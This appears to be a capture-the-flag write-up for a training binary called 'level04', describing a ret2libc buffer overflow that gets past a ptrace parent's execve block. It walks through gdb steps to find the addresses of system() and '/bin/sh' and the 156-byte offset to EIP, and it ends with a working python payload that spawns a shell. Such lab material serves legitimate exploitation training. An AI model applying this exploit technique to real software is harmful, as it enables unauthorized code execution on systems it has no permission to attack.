# Level 04

## Observations

1. There is a fork at the beginning of the program. Child process is waiting for user input while parent uses `ptrace()` to monitor child.
2. Child process gets user input with `gets()` ; there is no size limit.
3. The parent will kill the child as soon as it detects a call to `execve()`.

## Plan

We cannot spawn a shell using a shellcode because the parent process will kill any call to execve.  
Instead we will force the program to call a Libc function for us (`Ret2Libc`).  
Using a *Buffer Overflow* in the child process, we will manipulate the stack so that the program will return to the `system()` Libc function with `"/bin/sh"` as first argument.

We start debugging by putting a breakpoint in the main function and running the program.  
We will find the address of `system()` with a simple print of the symbol.

```txt
(gdb) b *main

(gdb) run
    [...]

(gdb) print system
    $1 = {<text variable, no debug info>} 0xf7e6aed0 <system>
```
Libc's `system()` function is at **0xF7E6AED0**.

Then we need to find the address of a string that is exactly `"/bin/sh"`.  
It is likely to be somewhere near the system function, we can locate it with the find command.
```
(gdb) find &system,+99999999,"/bin/sh"
    0xf7f897ec
```
There is a usable string at **0xF7F897EC**.

Last we need to find how many bytes we need to give to the child process input in order to overwrite EIP.  
Using GDB, we debug the program (don't forget to `set follow-fork-mode child` so we follow the child process after the fork).  
Feed it an [Overflow Pattern String](https://wiremask.eu/tools/buffer-overflow-pattern-generator/?) and use the address at which the program segfaulted to find the distance from the start of the buffer to EIP.  
The result is **156 bytes**

We need the stack to be in a very specific configuration with the `system()` function's address on top followed by an arbitrary return address and finally the address of the function's first argument.  
As usual, adresses have their bytes inverted because of little endian.

## Payload

```bash
(python -c 'print "A" * 156 + "\xf7\xe6\xae\xd0"[::-1] + "\xff\xff\xff\xff" + "\xf7\xf8\x97\xec"[::-1]'; cat -) | ./level04
```